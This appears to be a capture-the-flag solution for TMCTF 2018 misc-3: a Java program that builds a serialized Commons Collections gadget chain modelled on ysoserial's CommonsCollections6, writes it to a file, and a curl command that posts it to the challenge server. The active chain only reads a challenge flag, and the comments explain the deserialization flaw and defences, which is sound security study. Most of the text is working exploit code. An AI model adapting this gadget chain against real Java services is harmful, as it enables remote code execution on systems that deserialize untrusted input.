TMCTF 2018 misc-3
import java.io.*; | |
import java.util.*; | |
import javax.servlet.ServletInputStream; | |
import com.trendmicro.CustomOIS; | |
import com.trendmicro.Person; | |
import com.trendmicro.jail.Flag; | |
import org.apache.commons.collections.Factory; | |
import org.apache.commons.collections.Transformer; | |
import org.apache.commons.collections.*; | |
import org.apache.commons.collections.functors.*; | |
import org.apache.commons.collections.map.LazyMap; | |
import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.Constructor; | |
import java.lang.reflect.Field; | |
import java.lang.reflect.InvocationTargetException; | |
import javax.management.BadAttributeValueExpException; | |
import sun.reflect.ReflectionFactory; | |
/**
 * CTF proof-of-concept (TMCTF 2018 "misc-3") that builds a serialized object
 * graph out of Apache Commons Collections 3.x functors and round-trips it
 * through the challenge's {@code CustomOIS} stream.
 *
 * <p>Security context for readers: the graph is modelled on the publicly
 * documented CommonsCollections6 chain. It shows why calling
 * {@code readObject()} on attacker-supplied bytes is unsafe whenever
 * transformer classes such as {@code InvokerTransformer} are on the classpath:
 * rebuilding the map during deserialization is enough to run the chained
 * transformers, before application code ever inspects the result.
 *
 * <p>Defensive takeaways: do not use native Java deserialization for untrusted
 * input; where it cannot be avoided, enforce a strict allow-list (for example
 * with {@code java.io.ObjectInputFilter}) instead of a deny-list, and run
 * Commons Collections 3.2.2 or later, which refuses to deserialize these
 * functors by default. The functor class names travel in clear text inside the
 * serialized stream, so they are also a usable detection signal.
 *
 * <p>NOTE(review): the filtering rules of {@code CustomOIS} are not visible in
 * this file; nothing here documents what that class accepts or rejects.
 */
public class test {

    /**
     * Exposes the bytes collected in {@code baos} as a {@link ServletInputStream}.
     *
     * <p>Only {@code read()} is overridden, so every read is served one byte at
     * a time from an in-memory copy of the buffer taken when this method runs.
     *
     * @param baos buffer whose current contents back the returned stream
     * @return a servlet input stream over a snapshot of {@code baos}
     */
    public static ServletInputStream createServletInputStream2(ByteArrayOutputStream baos) {
        final byte[] snapshot = baos.toByteArray();
        final InputStream source = new ByteArrayInputStream(snapshot);
        return new ServletInputStream() {
            @Override
            public int read() throws IOException {
                return source.read();
            }
        };
    }

    /**
     * Builds the serializable map whose key is a {@code TiedMapEntry} bound to a
     * {@code LazyMap} decorated with a transformer chain.
     *
     * <p>The active chain only calls {@code getFlag()} on a challenge-provided
     * {@code Flag} instance; the stock command-execution chain from the
     * referenced upstream payload was left disabled by the author, which is why
     * {@code command} has no effect on the result.
     *
     * <p>The key is swapped in through reflection after the map is populated,
     * presumably so that hashing the entry (which would evaluate the lazy map)
     * does not happen while the graph is being built.
     *
     * @param command unused by the active transformer chain
     * @return the prepared {@link HashMap}, ready to be serialized
     * @throws Exception if any reflective lookup or access fails
     */
    public static Serializable getObject(final String command) throws Exception {
        // Kept from the original even though the active chain never reads it.
        final String[] execArgs = new String[] { command };

        final Transformer[] steps = new Transformer[] {
            new ConstantTransformer(new Flag()),
            new InvokerTransformer("getFlag", new Class[] {}, new Object[] {}),
            new ConstantTransformer("zzz")
        };
        Transformer chain = new ChainedTransformer(steps);

        final Map backing = new HashMap();
        final Map lazy = LazyMap.decorate(backing, chain);
        TiedMapEntry tiedEntry = new TiedMapEntry(lazy, "foo");

        // A plain HashMap carries the entry; an earlier HashSet-based wrapper
        // was left disabled in the original.
        HashMap map = new HashMap();
        map.put("foo", "bar");

        // The bucket array has a different field name on some runtimes.
        Field tableField;
        try {
            tableField = HashMap.class.getDeclaredField("table");
        } catch (NoSuchFieldException missing) {
            tableField = HashMap.class.getDeclaredField("elementData");
        }
        tableField.setAccessible(true);
        Object[] buckets = (Object[]) tableField.get(map);

        Object node = (buckets[0] != null) ? buckets[0] : buckets[1];

        // Debug dump the author used to locate the populated bucket.
        System.out.println("node=" + buckets);
        System.out.println("node=" + buckets.length);
        int slot = 0;
        while (slot < buckets.length) {
            System.out.println("array " + slot + " " + buckets[slot]);
            slot++;
        }
        System.out.println("node=" + node);

        // Hard-coded slot: presumably where the dump above showed the "foo"
        // entry on the author's JDK. It depends on HashMap's internal layout.
        node = buckets[7];

        Field keyField;
        try {
            keyField = node.getClass().getDeclaredField("key");
        } catch (Exception fallback) {
            keyField = Class.forName("java.util.MapEntry").getDeclaredField("key");
        }
        keyField.setAccessible(true);
        keyField.set(node, tiedEntry);

        return map;
    }

    /**
     * Serializes the object from {@link #getObject(String)}, writes the bytes to
     * a file named {@code payload}, then reads the same bytes back through
     * {@code CustomOIS} and prints whatever object comes out.
     *
     * <p>Any exception is reported on standard output and otherwise ignored.
     *
     * @param args ignored
     */
    public static void main(String[] args) {
        try {
            // Built but never used: the lookup that would evaluate this lazy
            // map is disabled in the original, along with several trial writes
            // of other objects.
            Transformer[] steps = new Transformer[] {
                new ConstantTransformer(new Flag()),
                new InvokerTransformer("getFlag", new Class[] {}, new Object[] {}),
                new ConstantTransformer("zzz")
            };
            final Transformer chain = new ChainedTransformer(steps);
            final Map<String, String> unusedLazyMap =
                LazyMap.decorate(new HashMap<>(), chain);

            System.out.println("flag: ");

            ByteArrayOutputStream baos = new ByteArrayOutputStream();
            ObjectOutputStream oos = new ObjectOutputStream(baos);
            oos.writeObject(getObject("dummy"));

            byte[] serialized = baos.toByteArray();
            FileOutputStream fos = new FileOutputStream("payload");
            fos.write(serialized);
            fos.close();

            System.out.println("go");

            // Local round trip through the challenge's own stream class.
            ServletInputStream sis = createServletInputStream2(baos);
            CustomOIS cois = new CustomOIS(sis);
            Object result = cois.readObject();
            System.out.println("result: " + result);
        } catch (Exception e) {
            // IOException and ClassNotFoundException were reported the same way.
            System.out.println(String.valueOf(e));
        }
    }
}
Run this Java code and
$ curl --data-binary '@payload' http://theflagmarshal.us-east-1.elasticbeanstalk.com/jail | grep TMCTF
Reference: https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections6.java